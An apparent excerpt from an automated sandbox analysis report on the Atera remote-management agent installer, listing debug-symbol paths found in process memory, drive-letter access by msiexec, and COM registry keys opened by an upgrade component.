                                Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbh source: rundll32.exe, 0000003B.00000003.2770793562.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773621288.0000000002C43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1914378345.0000016E73872000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb6 source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.2186532729.00000167D18B2000.00000002.00000001.01000000.00000018.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3069197465.00000277DFBD2000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3068434031.000002C38B812000.00000002.00000001.01000000.0000004B.sdmp
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb`? source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000003.2770950879.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000025.00000002.2377234109.000001D73B812000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbd source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2366091778.000001D722932000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdbSHA256G source: AgentPackageInternalPoller.exe, 00000039.00000002.2735782031.000001AA4B8B2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60A80000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDBP{ source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb8 source: AgentPackageProgramManagement.exe, 0000003C.00000002.3068434031.000002C38B812000.00000002.00000001.01000000.0000004B.sdmp
                                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdbSHA256 source: AgentPackageInternalPoller.exe, 00000039.00000002.2751650874.000001AA64032000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\A\_work\39\s\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net45\System.Runtime.InteropServices.RuntimeInformation.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1914378345.0000016E73872000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb( source: rundll32.exe, 0000003B.00000003.2770950879.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ?\C:\Windows\dll\mscorlib.pdb source: AgentPackageSTRemote.exe, 00000023.00000002.3129190490.0000015439D8E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates.Common\obj\Release\AgentPackageOsUpdates.Common.pdb!_;_ -__CorDllMainmscoree.dll source: AgentPackageOsUpdates.exe, 00000034.00000002.2787380704.000001FC47D22000.00000002.00000001.01000000.0000003C.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: /_/src/Polly/obj/Release/net461/Polly.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2818037392.000001FC60622000.00000002.00000001.01000000.0000003F.sdmp
                                Source: Binary string: ib.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AgentPackageInternalPoller.exe, 00000039.00000000.2679670717.000001AA4AD72000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 00000010.00000002.2532683015.000002BEFC122000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 00000010.00000002.2532683015.000002BEFC122000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2378477877.000001D73B962000.00000002.00000001.01000000.00000024.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dows\dll\mscorlib.pdbE source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2376997668.000001D73B7D2000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000000.2691141024.000002C38B3B2000.00000002.00000001.01000000.00000035.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3067723786.000002C38B7E2000.00000002.00000001.01000000.00000049.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2376501962.000001D73B702000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.2149423855.00000167D1432000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2778902999.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2188590383.00000280D3882000.00000002.00000001.01000000.00000019.sdmp, AgentPackageUpgradeAgent.exe, 00000030.00000002.2631969820.00000235BA360000.00000002.00000001.01000000.0000002A.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.PDBm source: rundll32.exe, 0000003B.00000003.2771430754.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp
                                Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256~ source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2188590383.00000280D3882000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2378477877.000001D73B962000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 00000030.00000002.2631969820.00000235BA360000.00000002.00000001.01000000.0000002A.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \mscorlib.pdbpdblib.pdb@rP source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2966294099.000001AF6AFC2000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: l\System.pdb} source: rundll32.exe, 0000003B.00000003.2770793562.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773621288.0000000002C43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdbTlnl `l_CorExeMainmscoree.dll source: AgentPackageTicketing.exe, 00000032.00000000.2625128438.00000277DF3C2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2966294099.000001AF6AFC2000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates\obj\Release\AgentPackageOsUpdates.pdb source: AgentPackageOsUpdates.exe, 00000034.00000000.2661915081.000001FC474F2000.00000002.00000001.01000000.0000002B.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdb source: AgentPackageInternalPoller.exe, 00000039.00000002.2751650874.000001AA64032000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: m\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2772634383.00000000028C7000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp
                                Source: Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmp
                                Source: Binary string: /_/src/Polly/obj/Release/net461/Polly.pdbSHA256I5 source: AgentPackageOsUpdates.exe, 00000034.00000002.2818037392.000001FC60622000.00000002.00000001.01000000.0000003F.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller\obj\Release\AgentPackageRuntimeInstaller.pdb source: AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dllt.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System.pdb source: rundll32.exe, 0000003B.00000002.2778902999.00000000070D0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000025.00000002.2366091778.000001D722932000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.2186532729.00000167D18B2000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2778902999.00000000070F7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000003.2771430754.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDA1000.00000004.00000020.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2819380529.000001FC60824000.00000004.00000020.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2819380529.000001FC6084E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\System.pdb source: rundll32.exe, 0000003B.00000003.2770793562.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773621288.0000000002C43000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2826793308.000001FC60AA9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2392046697.00007FFDF19DA000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1975610817.0000016E75E12000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates.Common\obj\Release\AgentPackageOsUpdates.Common.pdb source: AgentPackageOsUpdates.exe, 00000034.00000002.2787380704.000001FC47D22000.00000002.00000001.01000000.0000003C.sdmp
                                Source: Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdbot source: rundll32.exe, 0000003B.00000003.2770950879.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002C0D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1975610817.0000016E75E12000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.2377234109.000001D73B812000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmp
                                Source: Binary string: ent.pdb0P&F source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: .pdbesI source: AgentPackageOsUpdates.exe, 00000034.00000002.2819380529.000001FC6076A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 00000039.00000002.2735782031.000001AA4B8B2000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb* source: rundll32.exe, 0000003B.00000003.2771430754.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2773174630.0000000002BB5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mC:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003B.00000002.2772634383.00000000028C7000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000032.00000000.2625128438.00000277DF3C2000.00000002.00000001.01000000.00000028.sdmp
                                Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                Source: C:\Windows\System32\cscript.exeFile opened: c:
                                Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
